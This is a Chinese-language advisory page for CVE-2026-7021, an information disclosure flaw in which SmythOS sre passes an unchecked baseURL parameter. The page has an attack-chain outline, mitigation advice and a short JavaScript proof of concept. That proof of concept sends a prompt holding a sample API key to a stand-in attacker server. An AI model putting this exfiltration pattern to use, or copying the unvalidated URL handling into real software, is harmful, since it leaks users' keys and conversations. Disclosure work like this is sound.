CVE-2026-7021 SmythOS信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-7021

漏洞类型

信息泄露

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SmythOS sre

漏洞概述

SmythOS sre 是一款自动化构建AI智能体的平台。在版本 0.0.15 及更早版本中，其 Connector Service 组件的 `packages/sdk/src/LLM/utils.ts` 文件被发现存在安全缺陷。该漏洞源于对关键参数 `baseURL` 的处理不当，攻击者能够通过操纵该参数绕过安全限制，从而导致敏感信息的意外泄露。尽管该漏洞的CVSS评分为3.5（低危），但由于其攻击向量为网络，且需要较低的权限和用户交互，攻击者可以在远程发起攻击。目前已有公开的利用代码发布，鉴于厂商尚未做出修复回应，该风险对使用受影响版本的用户构成潜在威胁。

技术细节

该漏洞的根源在于 SmythOS sre SDK 中的 LLM 工具类文件（`packages/sdk/src/LLM/utils.ts`）未对传入的 `baseURL` 参数进行充分的安全校验和格式化。在正常业务逻辑中，`baseURL` 用于指定大语言模型服务的接口地址。然而，由于开发人员未能对该参数实施严格的白名单验证或 URL 格式规范化，攻击者可以传入一个精心构造的恶意 URL。利用此漏洞需要攻击者拥有一定权限（PR:L）并诱导用户进行交互（UI:R）。当应用程序使用被篡改的 `baseURL` 发起请求时，可能会将本应发送给合法 LLM 服务的 Prompt 数据或 API 密钥等敏感信息发送至攻击者控制的服务器。这种信息泄露不仅暴露了内部系统的配置细节，还可能泄露用户的私密对话内容。尽管该漏洞目前被标记为低危，且不影响系统的完整性和可用性，但在高安全需求的环境下，机密性泄露仍可能导致严重的合规问题。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用 SmythOS sre 0.0.15 或更早版本，并确认其 Connector Service 组件处于活跃状态。

STEP 2

获取访问权限

攻击者获取目标系统的低权限账户（PR:L），这是触发漏洞的必要条件之一。

STEP 3

漏洞利用

攻击者构造包含恶意 `baseURL` 参数的请求，并诱导授权用户点击或执行操作（UI:R），或者直接通过低权限 API 接口调用受影响的文件 `packages/sdk/src/LLM/utils.ts`。

STEP 4

信息泄露

应用程序处理恶意请求，将内部请求发送至攻击者指定的 URL，导致敏感信息（如 API Key、Prompt 内容）被发送到攻击者控制的服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-7021
// Description: Manipulating the baseURL argument in SmythOS sre <= 0.0.15
// to trigger information disclosure.
// File affected: packages/sdk/src/LLM/utils.ts

const axios = require('axios');

// Simulate the vulnerable SDK function
async function vulnerableLLMFunction(options) {
    const { baseURL, prompt } = options;
    // Vulnerability: baseURL is taken directly from user input without validation
    const targetUrl = `${baseURL}/v1/completions`;
    
    console.log(`[*] Sending request to: ${targetUrl}`);
    
    // In a real scenario, this might leak headers or data to the attacker controlled URL
    try {
        const response = await axios.post(targetUrl, {
            model: 'gpt-3',
            prompt: prompt
        });
        return response.data;
    } catch (error) {
        // Error handling might leak internal paths or debug info
        console.error(`Error: ${error.message}`);
        return null;
    }
}

// Exploit execution
(async () => {
    // Attacker controlled server to capture leaked information
    const maliciousBaseURL = 'http://attacker-controlled-server.com/log';
    const userPrompt = 'Secret API Key: sk-1234567890abcdef';

    console.log('[*] Starting exploit for CVE-2026-7021...');
    await vulnerableLLMFunction({
        baseURL: maliciousBaseURL,
        prompt: userPrompt
    });
    console.log('[+] Exploit finished. Check attacker server logs for leaked data.');
})();

影响范围

SmythOS sre <= 0.0.15

防御指南

临时缓解措施

鉴于厂商尚未响应，建议用户暂时禁用或严格限制 Connector Service 组件的对外访问权限。检查系统日志中是否存在对未知 `baseURL` 的访问记录。在应用网关层增加对 `baseURL` 参数的校验逻辑，确保其指向合法的内部或受信任的外部 LLM 服务地址。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7021
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7021
3 Details https://www.cvedetails.com/cve/CVE-2026-7021/
4 VulDB https://vuldb.com/cve/CVE-2026-7021
5 Link https://gist.github.com/YLChen-007/3d35e0ce8197989ee4de4a93def30d47
6 Link https://vuldb.com/submit/797642
7 Link https://vuldb.com/vuln/359600
8 Link https://vuldb.com/vuln/359600/cti